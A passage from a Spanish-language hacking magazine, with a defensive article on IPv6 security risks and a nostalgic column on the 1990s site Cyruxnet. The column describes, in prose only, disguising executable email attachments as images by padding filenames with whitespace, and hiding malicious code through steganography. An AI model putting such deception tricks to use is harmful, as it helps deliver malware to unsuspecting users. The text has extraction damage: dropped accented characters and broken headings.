comunicaciones, as como tambin contar con funciones de tunneling destinadas
a ayudar a organizaciones a dar conectividad IPv6 durante su periodo de transicin. As tambin existen servicios pblicos gratuitos para ofrecer a un usuario la
posibilidad de dar salida a un tunel IPv6
desde su terminal.

Esto puede permitir se establezcan formas de comunicacin desde dentro de o


hacia sitios restringidos externos a la red
encapsulando protocolos entre paquetes
IPv6 o usando tuneles de salida remotos
aprovechando la omisin de controlar lo
que entra y sale usando protocolo IPv6
o algn protocolo de tuneleo como 6en4,
6a4, teredo, etc.

Tecnologa
y servicios
inpreparados

IPv6 corrige algunos errores de diseo de IPv4 que se traducian en vulnerabilidades de seguridad muy dficiles
de enfrentar, para lo cual a lo largo del
tiempo se desarrollaron estrategias y
tecnologas que eran opcionales implementar, pero que al hacerlo se reducian

en gran medida riesgos severos como el


caso de IPsec.
Sin embargo, hay que recalcar que IPv6
en s no es un protocolo orientado a la seguridad, de manera que su implementacin de ninguna manera elimina riesgos
por lo que hay que entender y aplicar
todas las nuevas caractersticas que incorpora para ayudar a mejorar el nivel de
seguridad de una red.
Esta necesidad de conocer y aplicar las
nuevas funcionalidades tcnicas afectan
a los servicios de red y sistemas a todos
los niveles, desde la arquitectura y funciones importantes de las redes de comunicaciones, la configuracin de servicios
en clientes y servidores, y en particular
a los sistemas que se desarrollan ya que
si bien pudieran funcionar de forma compatible con IPv6 gracias al modelo de capas, es posible que se introduzcan nuevos
bugs y vulnerabilidades slo por el hecho
de convivir en un ambiente con ambos
protocolos habilitados y por depender de
mecanismos de proteccin externos ba-

www.hackingmexico.mx

37

riesgos de seguridad en IPV6

sados exclusivamente en lo que se puede


lograr con IPv4.
En pocas palabras, el diseo de la arquitectura de seguridad de un sistema tiene que
contemplar que eventualmente funcionar
tambin sobre redes y servidores con soporte IPv6 y las pruebas de calidad y segu-

Saturacin
de recursos
ridad del sistema deben de incluir casos de
prueba contemplando el mismo escenario.
Debido a que el protocolo IPv6 contempla 128 bits para designar el direccionamiento, se espera que a cada usuario y red
local se le delegen una enorme cantidad
de direcciones IP para su uso a discrecin
del administrador del segmento.
Estas increibles cantidades de direcciones que se ponen sobre la mesa a partir
de este momento, puede llegar a generar
una situacin de negacin de servicio

38

www.hackingmexico.mx

para dispositivos de red o sistemas que


levantan registros de las direcciones IPs
ya que al existir tantas, si por coincidencia o maliciosamente se ingresan en una
red paquetes IP que lleven al limite las
bitcoras y memorias internas de los dispositivos que no seran capaces de almacenar tanta cantidad de registros.
De hecho este tipo de vulnerabilidad ha
sido de las primeras que han sido documentadas y se comienza a descubrir se
encuentra presente en muchos productos
comerciales y sistemas de redes con IPv6
listo. [] http://www.networkworld.com/

Geolocalizacin
y personalizacin
de direcciones
news/2011/050311-microsoft-juniperipv6.html
Si bien la cantidad de direcciones IP disponible es inmensa, una combinacin de

funcionalidad tcnica y polticas administrativas crean un escenario donde cada


direccin IP pudiera llegar a quedar atada
a una persona en particular:
Las funcionalidades comunes de DHCP
que logran en muchos casos asignar
siempre una misma direccin al mismo
dispositivo.
Uno de los modos de autoconfiguracin por
default en muchos routers donde se toma la
direccin MAC del dispositivo para conformar la direccin IPv6 que se le asignar.
Si se omite habilitar el modo de privacidad
para la autoconfiguracin y ofuscacin de
la direccin IP usada por el dispositivo.
Las polticas de cada NIC regional donde se asignan bloques de direcciones IP
en base a una localizacin geogrfica por
pas, carrier, ISP, estado, regin o ciudad.
Es esperado en algn momento que cada
usuario y dispositivo llegue a tener una
direccin IPv6 fija de forma permanente,
de manera que tiene que considerarse las

riesgos de seguridad en IPV6

Tecnologa

naciente y

vulnerabilidades
por descubrir
implicaciones en cuanto a privacidad y
registrabilidad.
Como en todo producto tecnolgico de
creacin reciente, apenas est por iniciar
su etapa de evaluacin a gran escala por
parte de los usuarios y entusiastas que la
hackean hasta llevarla a sus lmites, de
manera que se tienen que tener durante
un largo tiempo la expectativa del des-

cubrimiento de vulnerabilidades en el
diseo del nuevo protocolo as como de
las implementaciones de este en todos los
productos comerciales que se usen.
Una parte considerable de riesgos de

Con

clu

Siendo una tecnologa relativamente nueva, se debe de tener preparacin adecuada


para su aplicacin prctica y resolucin de
incidentes, siendo para muchos un rea de
expertise que tienen que desarrollar con
urgencia debido a que antes de que se den
cuenta ya estarn viendose en la necesidad
de implementar servicios pblicos de red
por medio de este protocolo.

sio
nes

seguridad asociados a IPv6 proviene de


desinteresarse de su ya presencia actual
y no ver reflejada su consideracin en los
planes y polticas de seguridad.

www.hackingmexico.mx

39

old school

School

Old A

qui recordaremos
con nostalgia los
viejos tiempos,
las tcnicas
usadas, y eventos

importantes que ocurrieron en el


mundo del hack.
En esta ocasin hablaremos de

Cyruxnet, un portal informatico


que existio en los aos 90s
donde se publicaron por primera
vez tcnicas exclusivas, tales
como ocultamiento de .exes en
mensajes de Outlook express, lo

Cyruxnet,
un portal
informatico que
existio en los
aos 90s donde
se publicaron
por primera
vez tcnicas
exclusivas,
tales como
ocultamiento de
.exes

cual consista en agregar el valor


ASCII del espacio en blanco al
nombre del archivo despus de la
extensin para hacerlo pasar por
un archivo inofensivo.
Algo asi de sencillo, lograba

que cuando vieras el archivo


adjunto en tu correo, pensaras que
se trataba de una foto, pero en
realidad era un ejecutable.
Tambin fue de los primeros

sitios en publicar cdigos de


esteganografa para ocultar cdigo
malicioso dentro de fotos u otros
archivos. Un gran recurso de bugs
y exploits de la poca, cuando la
informacin de este tipo era un
poco mas difcil de conseguir.

40

www.hackingmexico.mx

seccion o articulo

www.hackingmexico.mx

41

seccion o articulo

42

www.hackingmexico.mx

I N T E G R AT E C O N N O S O T R O S
UNETE A NUESTRO EQUIPO DE COLABORADORES

informes 55 10 68 88 09
info@hackingmexico.mx

#01

Hackintosh: jailbreak IOS


Hacking Microsft C#
NAVEGACIN ANONIMA
Vulnerabilidad de Mikrotik Http Proxy
Facebook: Explotando al ser humano
El manifiesto Hacker
A quin le es llamado un Hacker

También podría gustarte